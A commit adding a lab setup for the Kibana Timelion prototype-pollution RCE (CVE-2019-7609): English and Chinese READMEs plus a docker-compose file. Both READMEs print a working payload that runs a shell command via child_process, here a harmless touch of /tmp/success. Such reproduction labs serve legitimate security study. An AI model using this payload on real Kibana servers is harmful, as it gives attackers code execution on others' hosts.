first commit

kibana/CVE-2019-7609/README.md

@@ -0,0 +1,42 @@
+# Kibana Prototype Pollution Leads to Remote Code Execution (CVE-2019-7609)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Kibana is an open source data visualization dashboard for Elasticsearch.
+
+Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
+
+References:
+
+- https://nvd.nist.gov/vuln/detail/CVE-2019-7609
+- https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/
+- https://slides.com/securitymb/prototype-pollution-in-kibana/#/4
+
+## Setup
+
+Before you can setup the environment, you need to change `vm.max_map_count` to greater than 262144 in host server (not in the docker container):
+
+```
+sysctl -w vm.max_map_count=262144
+```
+
+Then, start the Kibana 6.5.4 and Elasticsearch 6.8.6:
+
+```
+docker compose up -d
+```
+
+## Vulnerability Reproduce
+
+After started the environment, the Kibana is listening on `http://your-ip:5106`. The prototype pollution is happens in Timeline visualizer, fill in following payload here:
+
+```
+.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("/bin/touch /tmp/success");process.exit()//')
+.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
+```
+
+![](1.png)
+
+Then, visit "Canvas" page to trigger the command `/bin/touch /tmp/success`. The file `/tmp/success` is created successfully:
+
+![](2.png)

kibana/CVE-2019-7609/README.zh-cn.md

@@ -0,0 +1,40 @@
+# Kibana 原型链污染导致任意代码执行漏洞 (CVE-2019-7609)
+
+Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.15和6.6.1之前的版本中存在一处原型链污染漏洞，利用这个漏洞我们可以在目标服务器上执行任意JavaScript代码。
+
+参考链接：
+
+- https://nvd.nist.gov/vuln/detail/CVE-2019-7609
+- https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/
+- https://slides.com/securitymb/prototype-pollution-in-kibana/#/4
+
+## 漏洞环境
+
+启动环境前，需要先在Docker主机上执行如下命令，修改`vm.max_map_count`配置为262144：
+
+```
+sysctl -w vm.max_map_count=262144
+```
+
+之后，执行如下命令启动Kibana 6.5.4和Elasticsearch 6.8.6：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:5601`即可看到Kibana页面。
+
+## 漏洞复现
+
+原型链污染发生在“Timeline”页面，我们填入如下Payload：
+
+```
+.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("/bin/touch /tmp/success");process.exit()//')
+.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
+```
+
+![](1.png)
+
+成功后，再访问“Canvas”页面触发命令`/bin/touch /tmp/success`，可见`/tmp/success`已成功创建：
+
+![](2.png)

kibana/CVE-2019-7609/docker-compose.yml

@@ -0,0 +1,10 @@
+version: '2'
+services:
+ kibana:
+   image: vulhub/kibana:6.5.4
+   depends_on:
+    - elasticsearch
+   ports:
+    - "5601:5601"
+ elasticsearch:
+   image: vulhub/elasticsearch:6.8.6